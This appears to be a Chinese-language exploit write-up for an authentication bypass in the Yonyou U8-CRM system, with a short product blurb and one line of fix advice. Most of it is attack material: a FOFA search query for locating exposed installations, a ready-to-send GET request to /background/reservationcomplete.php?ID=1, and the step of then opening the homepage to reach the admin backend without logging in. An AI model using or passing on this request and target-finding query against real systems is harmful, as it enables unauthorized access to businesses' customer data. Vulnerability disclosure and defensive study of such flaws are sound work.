产品简介
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。
漏洞概述
CRM系统reservationcomplete.php接口处存在逻辑漏洞,攻击者通过漏洞可以进入系统后台
指纹识别
fofa:
app="用友U8CRM"
漏洞利用
poc:
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
访问漏洞url后,直接访问主页,即可绕过登录至后台
修复建议
联系软件厂商更新至最新安全版本
【人间处处,春雨杏花急急落,车马春山慢慢行。】